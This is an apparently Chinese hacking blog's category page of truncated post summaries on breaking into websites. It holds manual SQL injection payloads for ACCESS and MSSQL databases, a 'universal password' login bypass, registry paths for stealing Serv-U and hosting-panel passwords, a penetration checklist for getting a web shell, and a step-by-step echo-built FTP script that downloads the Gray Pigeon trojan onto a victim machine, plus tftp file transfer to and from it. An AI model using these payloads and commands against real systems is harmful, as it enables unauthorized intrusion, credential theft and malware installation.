随笔分类 - 【基础导读】
摘要:.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0(select count(*) from *) and 0(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到00)-- and 1=(select count(*) from admin where len(用户字段名称name)>0) and 1=(select count(*) from admin where len(_blank>密码字段
阅读全文
摘要:400无法解析此请求。401.1未经授权:访问由于凭据无效被拒绝。401.2未经授权:访问由于服务器配置倾向使用替代身份验证方法而被拒绝。401.3未经授权:访问由于ACL对所请求资源的设置被拒绝。401.4未经授权:Web服务器上安装的筛选器授权失败。401.5未经授权:ISAPI/CGI应用程序授权失败。401.7未经授权:由于Web服务器上的URL授权策略而拒绝访问。403禁止访问:访问被拒绝。403.1禁止访问:执行访问被拒绝。403.2禁止访问:读取访问被拒绝。403.3禁止访问:写入访问被拒绝。403.4禁止访问:需要使用SSL查看该资源。403.5禁止访问:需要使用SSL128查
阅读全文
摘要:1、FTP服务器的IP地址:如203.75.44.342、FTP服务器的用户名:如tty3、FTP服务器的密 码:如tty123在远程计算机的CMD下依次输入下面的命令:1、echo open 203.75.44.34>>tty.txt 登陆FTP服务器2、echo tty>>tty.txt 用户名3、echo tty123>>tty.txt 密码4、echo bin>>tty.txt 开始5、echo get mhgz.exe>>tty.txt 下载灰鸽子木马6、echo bye>>tty.txt 关闭FTP服务器输入上
阅读全文
摘要:在自已的机器上面运行TFTP后,把要上传 的文件复制到和TFTP同一个目录下,在对方机器上的c:\\winnt\\system32下打入指令,其他目录下也行,tftp -i 自已的IP get 要上传的程序,就实现了上传程序的目的,要下载到自已的机器上的话,只要把那条语的get改成put就行tftp -i 自已的IP put 要下载的程序
阅读全文
摘要:目标网站;http://www.xxx.com/可注入页面;http://www.xxx.com/CompHonorBig.asp?id=45猜表名 and (select count(*) from 表名)>0猜列名 and (select count(列名) from *)>0猜表段:xor exists (select * from *)猜字段数:order by 10 5个字段xor 1=2 union select 1,2,3 from adminhttp://www.xxx.com/CompHonorBig.asp?id=45 xor 1=2 union select
阅读全文
摘要:最全的Google黑客技巧介绍【吐血推荐】 inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用. intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题,URL等的文字).site: 可以限制你搜索范围的域名. filetype: 搜索文件的后缀或者扩展名intitle: 限制你搜索的网页标题.allintitle: 搜索所有关键字构成标题的网页. 但是推荐不要使用link: 可以得到一个所有包含了某个指定URL的页面列表. 例如link:www.google.com 就可以得到所有连接到Google的页面.不用担心=====
阅读全文
摘要:1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件;3.asp(aspx)+ACCESS拿shell一般只有3种方法,一是前台上传或者注入进后台上传;二是注入进后台改配置文件;三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句
阅读全文
摘要:3。猜表、字段名、检测记录数、检测字段长度。 我按照工具注入的流程给大家讲! A。猜表! 用到的语句:and exists (select count(*) from 你要猜的表名) 。在注入点后加上这句话,如果返回正常,说明你猜的表是存在的!比如 http://www.xxxxxxxx.com/article/as.asp?id=875 and exists (select count(*) from admin),如果返回正常,说明admin这张表存在!如果返回错误,就说明不存在!。别的表也都是这么猜! B。猜列! 用到的语句:and (select count(列名) from 猜到的表
阅读全文
摘要:要想学会手工注入,有一个名词是不得不提的,那就是数据库系统。 1。简介 数据库系统分为数据库和数据库管理系统!数据库是存放数据的地方,数据库管理系统则是管理数据库的软件!数据库中数据的存储节构叫数据模型!有四种常见的数据模型,分别是层次模型、网状模型、关系模型和面向对象模型。其中关系数据模型是最主要的数据模型,ACCESS、MSSQL、ORACLE等都是关系模型数据库系统。其中以ACCESS、MSSQL数据库系统最为常见!这些都是理论的知识,希望大家理解。 2。基本概念 表:表是一个关系数据库的基本组成元素!它按行与列组合排列成相关信息。通常行称为记录,列称为域。每个域称为一个字段!每一条记录
阅读全文
摘要:gpedit.msc-----组策略 sndrec32-- -----录音机 Nslookup-------IP地址侦测器 explorer---- ---打开资源管理器 logoff---------注销命令 tsshutdn---- ---60秒倒计时关机命令 lusrmgr.msc----本机用户和组 services.msc ---本地服务设置 oobe/msoobe /a----检查XP是否激活 notepad----- ---打开记事本 cleanmgr-------垃圾整理 net start messenger----开始信使服务 compmgmt.msc---计算机管理 ne
阅读全文
摘要:1.例如我们的目标网址为“http://www.baidu.com/forum/index.php”那么我们把地址改为http://www.baidu.com/forum/index.PHP后再浏览看看是否存在页面,如果存在的话,则服务器所使用的系统为windows,如果显示不存在,则服务器很有可能使用的是*nix系统。2. Ewebeditor拿站的新技巧Ewebeditor 大家应该是再熟悉不过的吧?先用默认密码admin888登陆,不行就下载默认数据库“/db/ewebeditor.mdb”,如果默认数据库也改了的话我们是不是就该放弃了呢?这里告诉大家我的经验!就是用密码admin999
阅读全文
摘要://看看是什么权限的and 1=(Select IS_MEMBER('db_owner'))And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HAS_DBACCESS('master'))And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --数字类型and char(124)%
阅读全文
摘要:编辑器加载中...平时收集的,一般服务器对注册表的读取 很少限制的,往往从注册表中能获取不少信息 HKEY_LOCAL_MACHINE\SYSTEM\Control001\Services\ #获取一些服务信息 HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\Domains\1\UserList\ #server-u HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersv
阅读全文
摘要:旁站路径问题1、读网站配置。2、用以下VBSOn Error Resume NextIf (LCase(Right(WScript.Fullname,11))="wscript.exe") ThenMsgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "Usage:Cscript vWeb.vbs",4096,"Lilo"WScript.QuitEnd IfSet ObjS
阅读全文
摘要:知识要点:最常见几种脚本类型:PHP,ASP(ASPX),JSP,常见WEB服务程序:Microsoft IIS,Apache,常见数据库服务程序:ACCSECC,MYSQL,MSSQL,Oracle网站脚本,WEB服务程序.数据库服务程序常见的组合包括: PHP+Apache+MYSQLASP+Microsoft IIS+ACCSECC ASP+Microsoft IIS+mssqlASPX+Microsoft IIS+MssqlJSP+TOMCAT+Oracle(比较少见) 上面列举的搭配只是最常见并不是绝对,例如也有PHP+Microsoft IIS+MSSQL判断方法,一、通过后缀判定
阅读全文
摘要:学习目标:掌握手工ACCCESS注入的方法,几个常用语句的使用学习要点:ACCESS数据库的注入与MSSQL不同,要得到表名,字段,以及字段的内容不能用MSSQL"暴"的方法直接得到(什么是"暴"以后在戒绍MSSQL注入时会介绍),ACCESS只能用猜解出表名和字段,然后再猜解出字段的长度,最后把字段的内容从第一位到第N位一个个猜解出来,采用的猜解方法类似玩一个游戏猜大小,比如一个数字,猜是否大于100如果不是,刚猜是否大于1,如果为正确,那么再猜是否大于50,如果正确,则再猜是否大于80,一直这样猜下去,这种猜解字段内容的方法,被称为"折半猜
阅读全文
摘要:1、site: 当我们用site提交查询的时候,Google会限制查询仅在某个网站,或是某个域下面进行。例 [admissions site:www.lse.ac.uk],提交这个查询仅仅会搜索网站 www.lse.ac.uk 下面关于admissions的信息。我们还可以限制搜索 仅在域下面进行, 例 [javascrip site:edu.cn],提交这个查询,仅仅在教育网查询关于javascrip 的信息。(site:后面不能跟空格,且site命令可以配合其它命令进行)2、inurl: 当我们用inurl进行查询的时候,Google会返回那些在URL (网址)里边包含了我们查询关键词的网
阅读全文
摘要:数字型:and 1=1 and 1=2 判断是否存在注入字符型:' and '1'='1 ' and '1'='2搜索型: 关键字%' and 1=1 and '%'='% 关键字%' and 1=2 and '%'='%IIS报错情况下使用: and user>0 (判断是ACCESS还是MSSQL)不报错则使用各自数据库特性来判断and (select count(*) from msysobjects)>0 (返回权限不足access数据库)and
阅读全文
摘要:【入侵】网站入侵思路(初级黑客渗透篇)[i=s] 本帖最后由 冷月星辰 于 2010-7-16 10:15 编辑 [/i]网站入侵思路(初级黑客渗透篇) 1,〓经典注入〓 通常,判断一个网站是否存在注入点,可以用’,and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,来判断,如果and 1=1正常返回页面,1=2错误,或者找不到,那么就存在注入点 2,〓万能密码OR漏洞〓 万能密码'or'='or',可以用在后台管理输入,有的网站由于没有过滤OR漏洞,输入OR直接就可以突破,一般漏洞存在于AS
阅读全文

浙公网安备 33010602011771号